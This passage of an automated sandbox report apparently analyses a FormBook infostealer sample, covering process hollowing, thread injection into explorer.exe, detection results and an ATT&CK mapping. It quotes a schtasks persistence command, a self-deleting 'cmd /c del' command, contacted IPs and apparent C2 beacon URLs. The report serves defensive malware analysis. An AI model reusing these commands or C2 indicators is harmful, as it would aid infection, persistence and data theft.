          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ECFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ECFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.208 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.77.226.209 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.44.212.169 80
          Source: C:\Windows\explorer.exeNetwork Connect: 146.148.193.212 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.155.166.181 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.105.124.225 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 173.234.175.134 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 205.134.254.189 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: B80000
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: explorer.exe, 00000006.00000000.242933358.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeQueries volume information: C:\Users\user\Desktop\J0OmHIagw8.exe VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection512Masquerading1OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Virtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339323 Sample: J0OmHIagw8.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 48 Tries to download HTTP data from a sinkholed server 2->48 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 12 other signatures 2->54 10 J0OmHIagw8.exe 6 2->10         started        process3 dnsIp4 46 192.168.2.1 unknown unknown 10->46 34 C:\Users\user\AppData\...\JcEEHoQdnETCO.exe, PE32 10->34 dropped 36 C:\Users\user\AppData\Local\...\tmpF65F.tmp, XML 10->36 dropped 38 C:\Users\user\AppData\...\J0OmHIagw8.exe.log, ASCII 10->38 dropped 14 vbc.exe 10->14         started        17 vbc.exe 10->17         started        19 schtasks.exe 1 10->19         started        file5 process6 signatures7 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Sample uses process hollowing technique 14->68 70 Queues an APC in another process (thread injection) 14->70 21 explorer.exe 14->21 injected 72 Tries to detect virtualization through RDTSC time measurements 17->72 25 conhost.exe 19->25         started        process8 dnsIp9 40 www.exit-divorce.com 192.155.166.181, 49761, 80 PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL United States 21->40 42 queensboutique1000.com 142.44.212.169, 49756, 49772, 80 OVHFR Canada 21->42 44 20 other IPs or domains 21->44 56 System process connects to network (likely due to code injection or exploit) 21->56 27 control.exe 21->27         started        signatures10 process11 signatures12 58 Modifies the context of a thread in another process (thread injection) 27->58 60 Maps a DLL or memory area into another process 27->60 62 Tries to detect virtualization through RDTSC time measurements 27->62 30 cmd.exe 1 27->30         started        process13 process14 32 conhost.exe 30->32         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          J0OmHIagw8.exe31%VirustotalBrowse
          J0OmHIagw8.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.stnanguo.com/csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT100%Avira URL Cloudphishing
          http://www.alparmuhendislik.com/csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
